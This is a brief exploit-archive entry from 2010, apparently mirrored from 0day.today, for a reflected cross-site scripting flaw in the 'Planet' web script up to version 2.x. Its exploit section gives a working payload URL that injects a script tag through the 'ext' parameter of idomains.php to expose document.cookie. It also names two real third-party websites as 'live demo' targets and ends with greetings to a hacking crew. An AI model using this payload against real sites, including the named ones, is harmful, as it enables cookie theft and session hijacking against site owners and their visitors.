id: 12241
date: 05/14/2010
title: Planet <= 2.x Cross Site Scripting Vulnerability
author: Mr.ThieF
cves: 

=================================================
Planet  <= 2.x Cross Site Scripting Vulnerability
=================================================


[~] Script: | Planet  <= 2.x Cross Site Scripting Vulnerability

[~] Author : Mr.ThieF

[~] Contact : Sj-@hotmail.com <~

[~] DorK : No Dork ^_*

[~] Software Link : http://www.femtoplanet.com/

[~] Exploit :

http://localhost/idomains.php?do=encode&decoded=&ext=[ Xss ]
http://localhost/idomains.php?do=encode&decoded=&ext="><script>alert(document.cookie);</script>

Live Demo  :

http://www.saudilead.com

http://jsr-host.com/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
GreeTz : RENO <3 - Saudi ViruS TeaM <3 - Mr.NrFzH <3 - Mr.End <3 - T3rr0risT <3 - ALL My FrindS <3



#  0day.today [2023-03-22]  #